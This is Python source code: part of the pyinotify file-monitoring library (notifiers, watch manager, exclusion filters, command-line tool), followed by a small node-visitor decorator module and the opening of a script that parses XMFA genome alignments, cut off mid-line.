self._stats_lock.acquire() try: return self._stats.copy() finally: self._stats_lock.release() def __repr__(self): stats = self._stats_copy() elapsed = int(time.time() - self._start_time) elapsed_str = '' if elapsed < 60: elapsed_str = str(elapsed) + 'sec' elif 60 <= elapsed < 3600: elapsed_str = '%dmn%dsec' % (elapsed / 60, elapsed % 60) elif 3600 <= elapsed < 86400: elapsed_str = '%dh%dmn' % (elapsed / 3600, (elapsed % 3600) / 60) elif elapsed >= 86400: elapsed_str = '%dd%dh' % (elapsed / 86400, (elapsed % 86400) / 3600) stats['ElapsedTime'] = elapsed_str l = [] for ev, value in sorted(stats.items(), key=lambda x: x[0]): l.append(' %s=%s' % (output_format.field_name(ev), output_format.field_value(value))) s = '<%s%s >' % (output_format.class_name(self.__class__.__name__), ''.join(l)) return s def dump(self, filename): """ Dumps statistics to file |filename|. @param filename: pathname. 
@type filename: string """ with open(filename, 'w') as file_obj: file_obj.write(str(self)) def __str__(self, scale=45): stats = self._stats_copy() if not stats: return '' m = max(stats.values()) unity = scale / m fmt = '%%-26s%%-%ds%%s' % (len(output_format.field_value('@' * scale)) + 1) def func(x): return fmt % (output_format.field_name(x[0]), output_format.field_value('@' * int(x[1] * unity)), output_format.simple('%d' % x[1], 'yellow')) s = '\n'.join(map(func, sorted(stats.items(), key=lambda x: x[0]))) return s class NotifierError(PyinotifyError): """ Notifier Exception. Raised on Notifier error. """ def __init__(self, err): """ @param err: Exception string's description. @type err: string """ PyinotifyError.__init__(self, err) class Notifier: """ Read notifications, process events. """ def __init__(self, watch_manager, default_proc_fun=None, read_freq=0, threshold=0, timeout=None): """ Initialization. read_freq, threshold and timeout parameters are used when looping. @param watch_manager: Watch Manager. @type watch_manager: WatchManager instance @param default_proc_fun: Default processing method. If None, a new instance of PrintAllEvents will be assigned. @type default_proc_fun: instance of ProcessEvent @param read_freq: if read_freq == 0, events are read asap, if read_freq is > 0, this thread sleeps max(0, read_freq - timeout) seconds. But if timeout is None it may be different because poll is blocking waiting for something to read. @type read_freq: int @param threshold: File descriptor will be read only if the accumulated size to read becomes >= threshold. If != 0, you likely want to use it in combination with an appropriate value for read_freq because without that you would keep looping without really reading anything and that until the amount of events to read is >= threshold. At least with read_freq set you might sleep. @type threshold: int @param timeout: http://docs.python.org/lib/poll-objects.html#poll-objects @type timeout: int """ # Watch Manager instance self._watch_manager = watch_manager # File descriptor self._fd = self._watch_manager.get_fd() # Poll object and registration self._pollobj = select.poll() self._pollobj.register(self._fd, select.POLLIN) # This pipe is correctely initialized and used by ThreadedNotifier self._pipe = (-1, -1) # Event queue self._eventq = deque() # System processing functor, common to all events self._sys_proc_fun = _SysProcessEvent(self._watch_manager, self) # Default processing method self._default_proc_fun = default_proc_fun if default_proc_fun is None: self._default_proc_fun = PrintAllEvents() # Loop parameters self._read_freq = read_freq self._threshold = threshold self._timeout = timeout # Coalesce events option self._coalesce = False # set of str(raw_event), only used when coalesce option is True self._eventset = set() def append_event(self, event): """ Append a raw event to the event queue. @param event: An event. @type event: _RawEvent instance. """ self._eventq.append(event) def proc_fun(self): return self._default_proc_fun def coalesce_events(self, coalesce=True): """ Coalescing events. Events are usually processed by batchs, their size depend on various factors. Thus, before processing them, events received from inotify are aggregated in a fifo queue. If this coalescing option is enabled events are filtered based on their unicity, only unique events are enqueued, doublons are discarded. An event is unique when the combination of its fields (wd, mask, cookie, name) is unique among events of a same batch. 
After a batch of events is processed any events is accepted again. By default this option is disabled, you have to explictly call this function to turn it on. @param coalesce: Optional new coalescing value. True by default. @type coalesce: Bool """ self._coalesce = coalesce if not coalesce: self._eventset.clear() def check_events(self, timeout=None): """ Check for new events available to read, blocks up to timeout milliseconds. @param timeout: If specified it overrides the corresponding instance attribute _timeout. @type timeout: int @return: New events to read. @rtype: bool """ while True: try: # blocks up to 'timeout' milliseconds if timeout is None: timeout = self._timeout ret = self._pollobj.poll(timeout) except select.error as err: if err.errno == errno.EINTR: continue # interrupted, retry else: raise else: break if not ret or (self._pipe[0] == ret[0][0]): return False # only one fd is polled return ret[0][1] & select.POLLIN def read_events(self): """ Read events from device, build _RawEvents, and enqueue them. """ buf_ = array.array('i', [0]) # get event queue size if fcntl.ioctl(self._fd, termios.FIONREAD, buf_, 1) == -1: return queue_size = buf_[0] if queue_size < self._threshold: log.debug('(fd: %d) %d bytes available to read but threshold is ' 'fixed to %d bytes', self._fd, queue_size, self._threshold) return try: # Read content from file r = os.read(self._fd, queue_size) except Exception as msg: raise NotifierError(msg) log.debug('Event queue size: %d', queue_size) rsum = 0 # counter while rsum < queue_size: s_size = 16 # Retrieve wd, mask, cookie and fname_len wd, mask, cookie, fname_len = struct.unpack('iIII', r[rsum:rsum+s_size]) # Retrieve name bname, = struct.unpack('%ds' % fname_len, r[rsum + s_size:rsum + s_size + fname_len]) # FIXME: should we explictly call sys.getdefaultencoding() here ?? uname = bname.decode() rawevent = _RawEvent(wd, mask, cookie, uname) if self._coalesce: # Only enqueue new (unique) events. raweventstr = str(rawevent) if raweventstr not in self._eventset: self._eventset.add(raweventstr) self._eventq.append(rawevent) else: self._eventq.append(rawevent) rsum += s_size + fname_len def process_events(self): """ Routine for processing events from queue by calling their associated proccessing method (an instance of ProcessEvent). It also does internal processings, to keep the system updated. """ while self._eventq: raw_event = self._eventq.popleft() # pop next event watch_ = self._watch_manager.get_watch(raw_event.wd) if watch_ is None: # Not really sure how we ended up here, nor how we should # handle these types of events and if it is appropriate to # completly skip them (like we are doing here). log.warning("Unable to retrieve Watch object associated to %s", repr(raw_event)) continue revent = self._sys_proc_fun(raw_event) # system processings if watch_ and watch_.proc_fun: watch_.proc_fun(revent) # user processings else: self._default_proc_fun(revent) self._sys_proc_fun.cleanup() # remove olds MOVED_* events records if self._coalesce: self._eventset.clear() def __daemonize(self, pid_file=None, force_kill=False, stdin=os.devnull, stdout=os.devnull, stderr=os.devnull): """ pid_file: file to which the pid will be written. force_kill: if True kill the process associated to pid_file. stdin, stdout, stderr: files associated to common streams. 
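        Example (illustrative): for a script started as 'mymonitor.py' with no
        explicit pid_file, the pid is written to '/var/run/mymonitor.py.pid'.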
""" if pid_file is None: dirname = '/var/run/' basename = os.path.basename(sys.argv[0]) or 'pyinotify' pid_file = os.path.join(dirname, basename + '.pid') if os.path.exists(pid_file): with open(pid_file, 'r') as fo: try: pid = int(fo.read()) except ValueError: pid = None if pid is not None: try: os.kill(pid, 0) except OSError as err: if err.errno == errno.ESRCH: log.debug(err) else: log.error(err) else: if not force_kill: s = 'There is already a pid file %s with pid %d' raise NotifierError(s % (pid_file, pid)) else: os.kill(pid, 9) def fork_daemon(): # Adapted from Chad J. Schroeder's recipe # @see http://code.activestate.com/recipes/278731/ pid = os.fork() if (pid == 0): # parent 2 os.setsid() pid = os.fork() if (pid == 0): # child os.chdir('/') os.umask(0) else: # parent 2 os._exit(0) else: # parent 1 os._exit(0) fd_inp = open(stdin, 'r') os.dup2(fd_inp.fileno(), 0) fd_out = open(stdout, 'w') os.dup2(fd_out.fileno(), 1) fd_err = open(stderr, 'w') os.dup2(fd_err.fileno(), 2) # Detach task fork_daemon() # Write pid with open(pid_file, 'w') as file_obj: file_obj.write(str(os.getpid()) + '\n') atexit.register(lambda : os.unlink(pid_file)) def _sleep(self, ref_time): # Only consider sleeping if read_freq is > 0 if self._read_freq > 0: cur_time = time.time() sleep_amount = self._read_freq - (cur_time - ref_time) if sleep_amount > 0: log.debug('Now sleeping %d seconds', sleep_amount) time.sleep(sleep_amount) def loop(self, callback=None, daemonize=False, **args): """ Events are read only one time every min(read_freq, timeout) seconds at best and only if the size to read is >= threshold. After this method returns it must not be called again for the same instance. @param callback: Functor called after each event processing iteration. Expects to receive the notifier object (self) as first parameter. If this function returns True the loop is immediately terminated otherwise the loop method keeps looping. @type callback: callable object or function @param daemonize: This thread is daemonized if set to True. @type daemonize: boolean @param args: Optional and relevant only if daemonize is True. Remaining keyworded arguments are directly passed to daemonize see __daemonize() method. @type args: various """ if daemonize: self.__daemonize(**args) # Read and process events forever while 1: try: self.process_events() if (callback is not None) and (callback(self) is True): break ref_time = time.time() # check_events is blocking if self.check_events(): self._sleep(ref_time) self.read_events() except KeyboardInterrupt: # Stop monitoring if sigint is caught (Control-C). log.debug('Pyinotify stops monitoring.') break # Close internals self.stop() def stop(self): """ Close inotify's instance (close its file descriptor). It destroys all existing watches, pending events,... This method is automatically called at the end of loop(). """ self._pollobj.unregister(self._fd) os.close(self._fd) class ThreadedNotifier(threading.Thread, Notifier): """ This notifier inherits from threading.Thread for instanciating a separate thread, and also inherits from Notifier, because it is a threaded notifier. Note that every functionality provided by this class is also provided through Notifier class. Moreover Notifier should be considered first because it is not threaded and could be easily daemonized. """ def __init__(self, watch_manager, default_proc_fun=None, read_freq=0, threshold=0, timeout=None): """ Initialization, initialize base classes. read_freq, threshold and timeout parameters are used when looping. 
@param watch_manager: Watch Manager. @type watch_manager: WatchManager instance @param default_proc_fun: Default processing method. See base class. @type default_proc_fun: instance of ProcessEvent @param read_freq: if read_freq == 0, events are read asap, if read_freq is > 0, this thread sleeps max(0, read_freq - timeout) seconds. @type read_freq: int @param threshold: File descriptor will be read only if the accumulated size to read becomes >= threshold. If != 0, you likely want to use it in combination with an appropriate value set for read_freq because without that you would keep looping without really reading anything and that until the amount of events to read is >= threshold. At least with read_freq you might sleep. @type threshold: int @param timeout: see http://docs.python.org/lib/poll-objects.html#poll-objects @type timeout: int """ # Init threading base class threading.Thread.__init__(self) # Stop condition self._stop_event = threading.Event() # Init Notifier base class Notifier.__init__(self, watch_manager, default_proc_fun, read_freq, threshold, timeout) # Create a new pipe used for thread termination self._pipe = os.pipe() self._pollobj.register(self._pipe[0], select.POLLIN) def stop(self): """ Stop notifier's loop. Stop notification. Join the thread. """ self._stop_event.set() os.write(self._pipe[1], b'stop') threading.Thread.join(self) Notifier.stop(self) self._pollobj.unregister(self._pipe[0]) os.close(self._pipe[0]) os.close(self._pipe[1]) def loop(self): """ Thread's main loop. Don't meant to be called by user directly. Call inherited start() method instead. Events are read only once time every min(read_freq, timeout) seconds at best and only if the size of events to read is >= threshold. """ # When the loop must be terminated .stop() is called, 'stop' # is written to pipe fd so poll() returns and .check_events() # returns False which make evaluate the While's stop condition # ._stop_event.isSet() wich put an end to the thread's execution. while not self._stop_event.isSet(): self.process_events() ref_time = time.time() if self.check_events(): self._sleep(ref_time) self.read_events() def run(self): """ Start thread's loop: read and process events until the method stop() is called. Never call this method directly, instead call the start() method inherited from threading.Thread, which then will call run() in its turn. """ self.loop() class AsyncNotifier(asyncore.file_dispatcher, Notifier): """ This notifier inherits from asyncore.file_dispatcher in order to be able to use pyinotify along with the asyncore framework. """ def __init__(self, watch_manager, default_proc_fun=None, read_freq=0, threshold=0, timeout=None, channel_map=None): """ Initializes the async notifier. The only additional parameter is 'channel_map' which is the optional asyncore private map. See Notifier class for the meaning of the others parameters. """ Notifier.__init__(self, watch_manager, default_proc_fun, read_freq, threshold, timeout) asyncore.file_dispatcher.__init__(self, self._fd, channel_map) def handle_read(self): """ When asyncore tells us we can read from the fd, we proceed processing events. This method can be overridden for handling a notification differently. """ self.read_events() self.process_events() class Watch: """ Represent a watch, i.e. a file or directory being watched. """ def __init__(self, wd, path, mask, proc_fun, auto_add, exclude_filter): """ Initializations. @param wd: Watch descriptor. @type wd: int @param path: Path of the file or directory being watched. 
@type path: str @param mask: Mask. @type mask: int @param proc_fun: Processing callable object. @type proc_fun: @param auto_add: Automatically add watches on new directories. @type auto_add: bool @param exclude_filter: Boolean function, used to exclude new directories from being automatically watched. See WatchManager.__init__ @type exclude_filter: callable object """ self.wd = wd self.path = path self.mask = mask self.proc_fun = proc_fun self.auto_add = auto_add self.exclude_filter = exclude_filter self.dir = os.path.isdir(self.path) def __repr__(self): """ @return: String representation. @rtype: str """ s = ' '.join(['%s%s%s' % (output_format.field_name(attr), output_format.punctuation('='), output_format.field_value(getattr(self, attr))) \ for attr in self.__dict__ if not attr.startswith('_')]) s = '%s%s %s %s' % (output_format.punctuation('<'), output_format.class_name(self.__class__.__name__), s, output_format.punctuation('>')) return s class ExcludeFilter: """ ExcludeFilter is an exclusion filter. """ def __init__(self, arg_lst): """ Examples: ef1 = ExcludeFilter(["^/etc/rc.*", "^/etc/hostname"]) ef2 = ExcludeFilter("/my/path/exclude.lst") Where exclude.lst contains: ^/etc/rc.* ^/etc/hostname @param arg_lst: is either a list of patterns or a filename from which patterns will be loaded. @type arg_lst: list of str or str """ if isinstance(arg_lst, str): lst = self._load_patterns_from_file(arg_lst) elif isinstance(arg_lst, list): lst = arg_lst else: raise TypeError self._lregex = [] for regex in lst: self._lregex.append(re.compile(regex, re.UNICODE)) def _load_patterns_from_file(self, filename): lst = [] with open(filename, 'r') as file_obj: for line in file_obj.readlines(): # Trim leading an trailing whitespaces pattern = line.strip() if not pattern or pattern.startswith('#'): continue lst.append(pattern) return lst def _match(self, regex, path): return regex.match(path) is not None def __call__(self, path): """ @param path: Path to match against provided regexps. @type path: str @return: Return True if path has been matched and should be excluded, False otherwise. @rtype: bool """ for regex in self._lregex: if self._match(regex, path): return True return False class WatchManagerError(Exception): """ WatchManager Exception. Raised on error encountered on watches operations. """ def __init__(self, msg, wmd): """ @param msg: Exception string's description. @type msg: string @param wmd: This dictionary contains the wd assigned to paths of the same call for which watches were successfully added. @type wmd: dict """ self.wmd = wmd Exception.__init__(self, msg) class WatchManager: """ Provide operations for watching files and directories. Its internal dictionary is used to reference watched items. When used inside threaded code, one must instanciate as many WatchManager instances as there are ThreadedNotifier instances. """ def __init__(self, exclude_filter=lambda path: False): """ Initialization: init inotify, init watch manager dictionary. Raise OSError if initialization fails. @param exclude_filter: boolean function, returns True if current path must be excluded from being watched. Convenient for providing a common exclusion filter for every call to add_watch. 
@type exclude_filter: callable object """ self._exclude_filter = exclude_filter self._wmd = {} # watch dict key: watch descriptor, value: watch self._fd = LIBC.inotify_init() # inotify's init, file descriptor if self._fd < 0: err = 'Cannot initialize new instance of inotify Errno=%s' raise OSError(err % strerrno()) def get_fd(self): """ Return assigned inotify's file descriptor. @return: File descriptor. @rtype: int """ return self._fd def get_watch(self, wd): """ Get watch from provided watch descriptor wd. @param wd: Watch descriptor. @type wd: int """ return self._wmd.get(wd) def del_watch(self, wd): """ Remove watch entry associated to watch descriptor wd. @param wd: Watch descriptor. @type wd: int """ try: del self._wmd[wd] except KeyError as err: log.error(str(err)) @property def watches(self): """ Get a reference on the internal watch manager dictionary. @return: Internal watch manager dictionary. @rtype: dict """ return self._wmd def __format_path(self, path): """ Format path to its internal (stored in watch manager) representation. """ # path must be a unicode string (str) and is just normalized. return os.path.normpath(path) def __add_watch(self, path, mask, proc_fun, auto_add, exclude_filter): """ Add a watch on path, build a Watch object and insert it in the watch manager dictionary. Return the wd value. """ path = self.__format_path(path) # path to a bytes string. This conversion seems to be required because # ctypes.create_string_buffer seems to manipulate bytes # strings representations internally. # Moreover it seems that LIBC.inotify_add_watch does not work very # well when it receives an ctypes.create_unicode_buffer instance as # argument. However wd are _always_ indexed with their original # unicode paths in wmd. byte_path = path.encode(sys.getfilesystemencoding()) wd_ = LIBC.inotify_add_watch(self._fd, ctypes.create_string_buffer(byte_path), mask) if wd_ < 0: return wd_ watch_ = Watch(wd=wd_, path=path, mask=mask, proc_fun=proc_fun, auto_add=auto_add, exclude_filter=exclude_filter) self._wmd[wd_] = watch_ log.debug('New %s', watch_) return wd_ def __glob(self, path, do_glob): if do_glob: return glob.iglob(path) else: return [path] def add_watch(self, path, mask, proc_fun=None, rec=False, auto_add=False, do_glob=False, quiet=True, exclude_filter=None): """ Add watch(s) on the provided |path|(s) with associated |mask| flag value and optionally with a processing |proc_fun| function and recursive flag |rec| set to True. All |path| components _must_ be str (i.e. unicode) objects. If |path| is already watched it is ignored, but if it is called with option rec=True a watch is put on each one of its not-watched subdirectory. @param path: Path to watch, the path can either be a file or a directory. Also accepts a sequence (list) of paths. @type path: string or list of strings @param mask: Bitmask of events. @type mask: int @param proc_fun: Processing object. @type proc_fun: function or ProcessEvent instance or instance of one of its subclasses or callable object. @param rec: Recursively add watches from path on all its subdirectories, set to False by default (doesn't follows symlinks in any case). @type rec: bool @param auto_add: Automatically add watches on newly created directories in watched parent |path| directory. @type auto_add: bool @param do_glob: Do globbing on pathname (see standard globbing module for more informations). @type do_glob: bool @param quiet: if False raises a WatchManagerError exception on error. See example not_quiet.py. 
@type quiet: bool @param exclude_filter: predicate (boolean function), which returns True if the current path must be excluded from being watched. This argument has precedence over exclude_filter passed to the class' constructor. @type exclude_filter: callable object @return: dict of paths associated to watch descriptors. A wd value is positive if the watch was added sucessfully, otherwise the value is negative. If the path was invalid or was already watched it is not included into this returned dictionary. @rtype: dict of {str: int} """ ret_ = {} # return {path: wd, ...} if exclude_filter is None: exclude_filter = self._exclude_filter # normalize args as list elements for npath in self.__format_param(path): # Require that path be a unicode string if not isinstance(npath, str): ret_[path] = -3 continue # unix pathname pattern expansion for apath in self.__glob(npath, do_glob): # recursively list subdirs according to rec param for rpath in self.__walk_rec(apath, rec): if self.get_wd(rpath) is not None: # We decide to ignore paths already inserted into # the watch manager. Need to be removed with rm_watch() # first. Or simply call update_watch() to update it. continue if not exclude_filter(rpath): wd = ret_[rpath] = self.__add_watch(rpath, mask, proc_fun, auto_add, exclude_filter) if wd < 0: err = 'add_watch: cannot watch %s WD=%d Errno=%s' err = err % (rpath, wd, strerrno()) if quiet: log.error(err) else: raise WatchManagerError(err, ret_) else: # Let's say -2 means 'explicitely excluded # from watching'. ret_[rpath] = -2 return ret_ def __get_sub_rec(self, lpath): """ Get every wd from self._wmd if its path is under the path of one (at least) of those in lpath. Doesn't follow symlinks. @param lpath: list of watch descriptor @type lpath: list of int @return: list of watch descriptor @rtype: list of int """ for d in lpath: root = self.get_path(d) if root is not None: # always keep root yield d else: # if invalid continue # nothing else to expect if not os.path.isdir(root): continue # normalization root = os.path.normpath(root) # recursion lend = len(root) for iwd in self._wmd.items(): cur = iwd[1].path pref = os.path.commonprefix([root, cur]) if root == os.sep or (len(pref) == lend and \ len(cur) > lend and \ cur[lend] == os.sep): yield iwd[1].wd def update_watch(self, wd, mask=None, proc_fun=None, rec=False, auto_add=False, quiet=True): """ Update existing watch descriptors |wd|. The |mask| value, the processing object |proc_fun|, the recursive param |rec| and the |auto_add| and |quiet| flags can all be updated. @param wd: Watch Descriptor to update. Also accepts a list of watch descriptors. @type wd: int or list of int @param mask: Optional new bitmask of events. @type mask: int @param proc_fun: Optional new processing function. @type proc_fun: function or ProcessEvent instance or instance of one of its subclasses or callable object. @param rec: Optionally adds watches recursively on all subdirectories contained into |wd| directory. @type rec: bool @param auto_add: Automatically adds watches on newly created directories in the watch's path corresponding to |wd|. @type auto_add: bool @param quiet: If False raises a WatchManagerError exception on error. See example not_quiet.py @type quiet: bool @return: dict of watch descriptors associated to booleans values. True if the corresponding wd has been successfully updated, False otherwise. 
@rtype: dict of {int: bool} """ lwd = self.__format_param(wd) if rec: lwd = self.__get_sub_rec(lwd) ret_ = {} # return {wd: bool, ...} for awd in lwd: apath = self.get_path(awd) if not apath or awd < 0: err = 'update_watch: invalid WD=%d' % awd if quiet: log.error(err) continue raise WatchManagerError(err, ret_) if mask: addw = LIBC.inotify_add_watch # apath is always stored as unicode string so encode it to # bytes. byte_path = apath.encode(sys.getfilesystemencoding()) wd_ = addw(self._fd, ctypes.create_string_buffer(byte_path), mask) if wd_ < 0: ret_[awd] = False err = 'update_watch: cannot update %s WD=%d Errno=%s' err = err % (apath, wd_, strerrno()) if quiet: log.error(err) continue raise WatchManagerError(err, ret_) assert(awd == wd_) if proc_fun or auto_add: watch_ = self._wmd[awd] if proc_fun: watch_.proc_fun = proc_fun if auto_add: watch_.auto_add = auto_add ret_[awd] = True log.debug('Updated watch - %s', self._wmd[awd]) return ret_ def __format_param(self, param): """ @param param: Parameter. @type param: string or int @return: wrap param. @rtype: list of type(param) """ if isinstance(param, list): for p_ in param: yield p_ else: yield param def get_wd(self, path): """ Returns the watch descriptor associated to path. This method presents a prohibitive cost, always prefer to keep the WD returned by add_watch(). If the path is unknown it returns None. @param path: Path. @type path: str @return: WD or None. @rtype: int or None """ path = self.__format_path(path) for iwd in self._wmd.items(): if iwd[1].path == path: return iwd[0] def get_path(self, wd): """ Returns the path associated to WD, if WD is unknown it returns None. @param wd: Watch descriptor. @type wd: int @return: Path or None. @rtype: string or None """ watch_ = self._wmd.get(wd) if watch_ is not None: return watch_.path def __walk_rec(self, top, rec): """ Yields each subdirectories of top, doesn't follow symlinks. If rec is false, only yield top. @param top: root directory. @type top: string @param rec: recursive flag. @type rec: bool @return: path of one subdirectory. @rtype: string """ if not rec or os.path.islink(top) or not os.path.isdir(top): yield top else: for root, dirs, files in os.walk(top): yield root def rm_watch(self, wd, rec=False, quiet=True): """ Removes watch(s). @param wd: Watch Descriptor of the file or directory to unwatch. Also accepts a list of WDs. @type wd: int or list of int. @param rec: Recursively removes watches on every already watched subdirectories and subfiles. @type rec: bool @param quiet: If False raises a WatchManagerError exception on error. See example not_quiet.py @type quiet: bool @return: dict of watch descriptors associated to booleans values. True if the corresponding wd has been successfully removed, False otherwise. @rtype: dict of {int: bool} """ lwd = self.__format_param(wd) if rec: lwd = self.__get_sub_rec(lwd) ret_ = {} # return {wd: bool, ...} for awd in lwd: # remove watch wd_ = LIBC.inotify_rm_watch(self._fd, awd) if wd_ < 0: ret_[awd] = False err = 'rm_watch: cannot remove WD=%d Errno=%s' % (awd, strerrno()) if quiet: log.error(err) continue raise WatchManagerError(err, ret_) ret_[awd] = True log.debug('Watch WD=%d (%s) removed', awd, self.get_path(awd)) return ret_ def watch_transient_file(self, filename, mask, proc_class): """ Watch a transient file, which will be created and deleted frequently over time (e.g. pid file). 
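        A sketch of a typical call, where MyProcessEvent stands for any
        ProcessEvent subclass supplied by the caller and the pid file path is
        illustrative:

            wm.watch_transient_file('/var/run/foo.pid',
                                    IN_CREATE | IN_DELETE,
                                    MyProcessEvent)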
@attention: Currently under the call to this function it is not possible to correctly watch the events triggered into the same base directory than the directory where is located this watched transient file. For instance it would be wrong to make these two successive calls: wm.watch_transient_file('/var/run/foo.pid', ...) and wm.add_watch('/var/run/', ...) @param filename: Filename. @type filename: string @param mask: Bitmask of events, should contain IN_CREATE and IN_DELETE. @type mask: int @param proc_class: ProcessEvent (or of one of its subclass), beware of accepting a ProcessEvent's instance as argument into __init__, see transient_file.py example for more details. @type proc_class: ProcessEvent's instance or of one of its subclasses. @return: Same as add_watch(). @rtype: Same as add_watch(). """ dirname = os.path.dirname(filename) if dirname == '': return {} # Maintains coherence with add_watch() basename = os.path.basename(filename) # Assuming we are watching at least for IN_CREATE and IN_DELETE mask |= IN_CREATE | IN_DELETE def cmp_name(event): if getattr(event, 'name') is None: return False return basename == event.name return self.add_watch(dirname, mask, proc_fun=proc_class(ChainIfTrue(func=cmp_name)), rec=False, auto_add=False, do_glob=False, exclude_filter=lambda path: False) class RawOutputFormat: """ Format string representations. """ def __init__(self, format=None): self.format = format or {} def simple(self, s, attribute): if not isinstance(s, str): s = str(s) return (self.format.get(attribute, '') + s + self.format.get('normal', '')) def punctuation(self, s): """Punctuation color.""" return self.simple(s, 'normal') def field_value(self, s): """Field value color.""" return self.simple(s, 'purple') def field_name(self, s): """Field name color.""" return self.simple(s, 'blue') def class_name(self, s): """Class name color.""" return self.format.get('red', '') + self.simple(s, 'bold') output_format = RawOutputFormat() class ColoredOutputFormat(RawOutputFormat): """ Format colored string representations. """ def __init__(self): f = {'normal': '\033[0m', 'black': '\033[30m', 'red': '\033[31m', 'green': '\033[32m', 'yellow': '\033[33m', 'blue': '\033[34m', 'purple': '\033[35m', 'cyan': '\033[36m', 'bold': '\033[1m', 'uline': '\033[4m', 'blink': '\033[5m', 'invert': '\033[7m'} RawOutputFormat.__init__(self, f) def compatibility_mode(): """ Use this function to turn on the compatibility mode. The compatibility mode is used to improve compatibility with Pyinotify 0.7.1 (or older) programs. The compatibility mode provides additional variables 'is_dir', 'event_name', 'EventsCodes.IN_*' and 'EventsCodes.ALL_EVENTS' as Pyinotify 0.7.1 provided. Do not call this function from new programs!! Especially if there are developped for Pyinotify >= 0.8.x. """ setattr(EventsCodes, 'ALL_EVENTS', ALL_EVENTS) for evname in globals(): if evname.startswith('IN_'): setattr(EventsCodes, evname, globals()[evname]) global COMPATIBILITY_MODE COMPATIBILITY_MODE = True def command_line(): """ By default the watched path is '/tmp' and all types of events are monitored. Events monitoring serves forever, type c^c to stop it. 
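    Example invocations, assuming this module is run directly as a script
    (the watched paths are illustrative):

        python pyinotify.py -v /tmp
        python pyinotify.py -r -a -e IN_CREATE,IN_DELETE /var/log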
""" from optparse import OptionParser usage = "usage: %prog [options] [path1] [path2] [pathn]" parser = OptionParser(usage=usage) parser.add_option("-v", "--verbose", action="store_true", dest="verbose", help="Verbose mode") parser.add_option("-r", "--recursive", action="store_true", dest="recursive", help="Add watches recursively on paths") parser.add_option("-a", "--auto_add", action="store_true", dest="auto_add", help="Automatically add watches on new directories") parser.add_option("-e", "--events-list", metavar="EVENT[,...]", dest="events_list", help=("A comma-separated list of events to watch for - " "see the documentation for valid options (defaults" " to everything)")) parser.add_option("-s", "--stats", action="store_true", dest="stats", help="Display dummy statistics") parser.add_option("-V", "--version", action="store_true", dest="version", help="Pyinotify version") parser.add_option("-f", "--raw-format", action="store_true", dest="raw_format", help="Disable enhanced output format.") (options, args) = parser.parse_args() if options.verbose: log.setLevel(10) if options.version: print(__version__) if not options.raw_format: global output_format output_format = ColoredOutputFormat() if len(args) < 1: path = '/tmp' # default watched path else: path = args # watch manager instance wm = WatchManager() # notifier instance and init if options.stats: notifier = Notifier(wm, default_proc_fun=Stats(), read_freq=5) else: notifier = Notifier(wm, default_proc_fun=PrintAllEvents()) # What mask to apply mask = 0 if options.events_list: events_list = options.events_list.split(',') for ev in events_list: evcode = EventsCodes.ALL_FLAGS.get(ev, 0) if evcode: mask |= evcode else: parser.error("The event '%s' specified with option -e" " is not valid" % ev) else: mask = ALL_EVENTS # stats cb_fun = None if options.stats: def cb(s): sys.stdout.write(repr(s.proc_fun())) sys.stdout.write('\n') sys.stdout.write(str(s.proc_fun())) sys.stdout.write('\n') sys.stdout.flush() cb_fun = cb log.debug('Start monitoring %s, (press c^c to halt pyinotify)' % path) wm.add_watch(path, mask, rec=options.recursive, auto_add=options.auto_add) # Loop forever (until sigint signal get caught) notifier.loop(callback=cb_fun) if __name__ == '__main__': command_line()
# vim: ts=4 sw=4 expandtab
"""
This is an abstract module for visiting specific nodes. It is used to
traverse the tree to generate warnings.
"""

def visit(event, *args):
    """
    This decorator is used to indicate which nodes the function should
    examine. The function should accept (self, node) and return the
    relevant node or None.
    """
    def _decorate(fn):
        fn._visit_event = event
        fn._visit_nodes = args
        return fn
    return _decorate

def make_visitors(visitors, klasses):
    """
    Searches klasses for all member functions decorated with @visit and
    fills a dictionary that looks like:

    visitors = {
        'event_name': {
            'node_type': [func1, func2]
        }
    }
    """
    assert isinstance(visitors, dict)

    # Instantiate an instance of each class
    for klass in klasses:
        if klass.__name__.lower() != klass.__name__:
            raise ValueError('class names must be lowercase')
        if not klass.__doc__:
            raise ValueError('missing docstring on class %s' % klass.__name__)

        # Look for functions with the "_visit_nodes" property.
        visitor = klass()
        for func in [getattr(visitor, name) for name in dir(visitor)]:
            event_visitors = None
            for node_kind in getattr(func, '_visit_nodes', ()):
                # Group visitors by event (e.g. push vs pop)
                if not event_visitors:
                    try:
                        event_visitors = visitors[func._visit_event]
                    except KeyError:
                        event_visitors = visitors[func._visit_event] = {}

                # Map from node_kind to the function
                try:
                    event_visitors[node_kind].append(func)
                except KeyError:
                    event_visitors[node_kind] = [func]
    return visitors
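if __name__ == '__main__':
    # Minimal self-check sketch of how @visit and make_visitors() fit
    # together; the event name 'push' and node kind 'function' are
    # illustrative, not names this module defines.
    class demovisitor:
        """Collect every 'function' node that gets pushed."""

        @visit('push', 'function')
        def on_function(self, node):
            return node

    table = make_visitors({}, [demovisitor])
    assert list(table['push'].keys()) == ['function']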
#!/usr/bin/env python import argparse import logging import sys from BCBio import GFF from Bio import SeqIO from Bio.Seq import Seq from Bio.SeqFeature import ( FeatureLocation, SeqFeature ) from Bio.SeqRecord import SeqRecord logging.basicConfig(level=logging.INFO) log = logging.getLogger(__name__) # Patch bcbio gff to work around url encoding issue. This is clearly # sub-optimal but we should transition to the newer library. def _new_format_keyvals(self, keyvals): return ";".join(["%s=%s" % (k, ",".join(v)) for (k, v) in sorted(keyvals.items())]) GFF.GFFOutput.GFF3Writer._format_keyvals = _new_format_keyvals def parse_xmfa(xmfa): """Simple XMFA parser until https://github.com/biopython/biopython/pull/544 """ current_lcb = [] current_seq = {} for line in xmfa.readlines(): if line.startswith('#'): continue if line.strip() == '=': if 'id' in current_seq: current_lcb.append(current_seq) current_seq = {} yield current_lcb current_lcb = [] else: line = line.strip() if line.startswith('>'): if 'id' in current_seq: current_lcb.append(current_seq) current_seq = {} data = line.strip().split() id, loc = data[1].split(':') start, end = loc.split('-') current_seq = { 'rid': '_'.join(data[1:]), 'id': id, 'start': int(start), 'end': int(end), 'strand': 1 if data[2] == '+' else -1, 'seq': '' } else: current_seq['seq'] += line.strip() def _percent_identity(a, b): """Calculate % identity, ignoring gaps in the host sequence """ match = 0 mismatch = 0 for char_a, char_b in zip(list(a), list(b)): if char_a == '-': continue if char_a == char_b: match += 1 else: mismatch += 1 if match + mismatch == 0: return 0 return 100 * float(match) / (match + mismatch) def _id_tn_dict(sequences): """Figure out sequence IDs """ label_convert = {} if sequences is not None: if len(sequences) == 1: for i, record in enumerate(SeqIO.parse(sequences[0], 'fasta')): label_convert[str(i + 1)] = record.id else: for i, sequence in enumerate(sequences): for record in 